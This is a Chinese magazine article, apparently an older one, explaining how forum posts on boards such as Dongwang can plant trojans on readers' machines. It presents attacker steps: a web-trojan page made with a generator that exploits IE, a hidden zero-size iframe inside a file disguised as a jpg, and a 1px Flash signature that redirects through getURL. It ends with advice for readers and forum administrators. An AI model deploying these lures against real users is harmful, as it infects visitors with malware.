小李平时很喜欢泡论坛,这天他到自己常去的一个论坛回帖之后,电脑莫名其妙地重启,重新开机之后感觉系统变得很慢。莫非帖子中暗藏机关?小李更新杀毒软件的病毒库后一查,果然自己的系统中了木马……
论坛往往是一个网站中人气最旺的地方,但很少有人注意到论坛给浏览者带来的安全问题,而像小李这样的遭遇却是真实存在的!下面我们就为大家“挖”出论坛帖子中暗藏的害人陷阱。
浏览帖子有隐忧
现在很多论坛程序在开发时,会添加一些扩展功能,例如:可以在帖子中引用UBB标签,可以在帖子中隐藏网页真实地址,可以在个人签名中加入特殊效果等。
这些功能虽然方便了浏览者,但同时也带来很多安全隐患。恶意攻击者可能借助这些功能,使用网页木马等攻击浏览者的系统。我们在这里模拟攻击者,为大家揭露这些攻击手法。
制造“陷阱”
选择任一功能稍微强大的论坛(例如动网,它在国内非常流行,而且所带的扩展功能非常多)下手。
先利用网页木马生成器制作木马网页,它利用的是IE浏览器漏洞。打开网页木马生成器,单击 “选择”按钮,然后选择木马程序mm.exe,生成2个文件:mm.chm和mm.html(图1)。将这两个文件以及木马程序mm.exe上传到网站空间中,就可以得到一个木马网页,地址以mm.html结尾,例如:http://www.***.com/mm.html)。
图1 利用网页木马生成器生成木马网页
接下来就是利用论坛的一些扩展功能暗布“陷阱”,使浏览者在无意间打开帖子时中招。
使用陷阱
1.陷阱一:文字诱骗
通过帖子中的文字诱骗你单击木马网页链接,这是论坛帖子中最常见的“陷阱”。
攻击者进入准备下手的论坛,申请账号,然后到其中任一版块发表帖子。帖子内容一般是带有诱惑性的信息:
输入完毕之后,发表帖子。
小提示:这里发表帖子使用的“ ”标签是动网论坛的内置标签,可以起到链接的作用,其他论坛也有使用此标签的。
当你浏览这个帖子时,会发现帖子中只显示了文本内容:
这里有最新最热的游戏资料和demo下载,赶快进来吧!
一般不清楚的人都会好奇地打开查看,从而打开了木马网页http://www.***.com/mm.html,使自己的系统被种植了木马。
其实只要把鼠标指针放到文字上,就会在IE浏览器的左下角显示这个链接的真实地址http://www.***.com/mm.html(图2)。
图2 碰到这样的帖子,可得多个心眼
如果你遇到了这样富有诱惑力的帖子,千万不要贸然地打开查看,因为里面可能隐藏的就是木马网页。
2.陷阱二:图片诱骗 在帖子中显示一张很大的图片,你为了观看全貌,就对图片进行点击,选择在新窗口中打开查看。这样就会打开木马网页,而你看到的仍然是图片。 攻击者首先准备一张超宽的图片(超过帖子页面限制),命名为“022.jpg”(此处文件名“022.jpg”中的“0”是阿拉伯数字),将其上传到网站空间得到地址:http://www.***.com/022.jpg,再将以下代码保存在记事本中: <img aligh=middle src="022.jpg"><iframe src="http://www.***.com/mm.html" name="zhu" width="0" height="0" frameborder="0"><br> 保存文件名为:O22.jpg(此处文件名“O22.jpg”中的“O”是大写字母)。 将含有代码的O22.jpg文件上传到网站空间图片文件022.jpg的同一路径下,得到地址:http://www.***.com/O22.jpg,这样就得到了一个图片木马的地址。 小提示:虽然将htm文件的后缀名改为jpg,但是在打开的时候,浏览器仍然会以网页的形式打开,这样就运行了其中的代码,而其中的代码则是链接到木马网页地址http://www.***.com/mm.html,从而使你的系统中木马。 进入论坛,在帖子中输入如下代码(图3): 这行代码的含义是使帖子中显示一张图片,图片为http://www.***.com/022.jpg,而其链接到的地址是http://www.***.com/O22.jpg(木马网页的地址)。 图3 这段代码中暗藏玄机
这样帖子显示的是一幅图片022.jpg,由于图片022.jpg非常宽,所以帖子中只显示了部分图片,而你为了看到图片的全貌,必然点击图片,想在新窗口中打开图片,这样就打开了木马网页http://www.***.com/O22.jpg。虽然后台打开了木马网页,但是图片仍然正常显示,因为O22.jpg中包含了一句代码:<img aligh=middle src="022.jpg">,即表面上仍然显示022.jpg图片文件。3.陷阱三:动画签名诱骗 个人签名是论坛的特色,如果论坛在默认情况下允许使用Flash动画作为论坛签名,攻击者完全可以构造一个存在恶意功能的Flash动画作为论坛签名,从而实现木马网页的大面积传播。下面就为大家揭示这种攻击手法。 Flash MX有一个功能叫“get url”,它能够在你欣赏Flash动画时自动跳转到“get url”中设置的URL地址,从而打开新的网站地址。攻击者完全可以利用“get url”功能制作Flash动画,使你在访问时自动跳转到一些恶意网页(例如木马网页)。 首先,打开Flash MX,单击工具栏中的“修改”,打开“修改文档属性”面板,设置Flash的尺寸,将其宽和高都设为1px,其余的选项保持不变。之所以将宽和高都设为1px,是因为px值越小,Flash动画下载得越快。 其次,在动画文档下方的“动作”栏进行设置,先选择“actions”,然后选择其中的“getURL”动作,双击它,出现设置该动作的面板(图4)。在其中的URL项目中填写要跳转的地址,窗口选择“_blank”(打开一个新窗口显示URL)。 最后,在“getURL”中填写一些恶性网站的地址,例如木马网页地址http://www.***.com/mm.html。 图4 生成恶意Falsh动画 设置好之后,单击工具栏的“文件”→“输出”,生成动画,然后将这个动画上传到网站空间中,得到地址:http://www.***.com/test.swf。 步骤3:进入论坛修改注册账号的个人签名,加入以下代码: [swf] http://www.***.com/test.swf[/swf] 提交修改资料,就获得了一个恶意的论坛Falsh签名(图5)。你一旦打开带有这种签名的帖子,恶意Flash文件就会悄悄运行,并打开木马网页,使你的系统在毫无察觉的情况下中木马。 图5 生成恶意论坛签名 论坛的扩展功能造成的“陷阱”就为大家介绍到这里,大家在浏览帖子的时候需要加倍小心。 编后:如果你是一个论坛的管理员,当看到恶意攻击者在你的论坛发布恶意帖子,应该怎么办呢?以动网论坛为例,进入论坛的管理后台,依次进入“论坛管理”→“管理”→“高级设置”中,将“帖子相关设置”中的HTML代码解析,UBB代码解析等功能关闭掉(图6)。再进入“论坛常规设置”中,将“用户选项”中的用户签名是否开启UBB代码,用户是否开启Flash标签等功能关闭,这样就杜绝了攻击者利用这种诱骗的手法来到论坛捣乱。